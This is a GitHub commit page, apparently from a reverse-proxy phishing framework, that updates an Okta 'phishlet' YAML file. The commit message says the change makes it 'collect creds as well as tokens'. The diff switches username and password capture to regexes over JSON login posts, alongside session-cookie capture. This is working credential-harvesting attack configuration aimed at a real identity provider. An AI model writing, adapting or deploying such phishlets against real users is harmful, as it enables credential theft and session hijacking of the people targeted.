Skip to content

Commit

Permalink
Update okta.yaml
Browse files Browse the repository at this point in the history
Okta uses JSON to auth. I fixed this YAML so it will collect creds as well as tokens.
  • Loading branch information
sho-luv authored and kgretzky committed Feb 2, 2021
1 parent 1c1476a commit b94439b
Showing 1 changed file with 6 additions and 6 deletions.
12 changes: 6 additions & 6 deletions phishlets/okta.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -11,13 +11,13 @@ auth_tokens:
keys: ['sid']
credentials:
username:
key: 'email'
search: '(.*)'
type: 'post'
key: ''
search: '"username":"([^"]*)'
type: 'json'
password:
key: 'password'
search: '(.*)'
type: 'post'
key: ''
search: '"password":"([^"]*)'
type: 'json'
login:
domain: 'EXAMPLE.okta.com'
path: '/login/login.htm'

0 comments on commit b94439b

Please sign in to comment.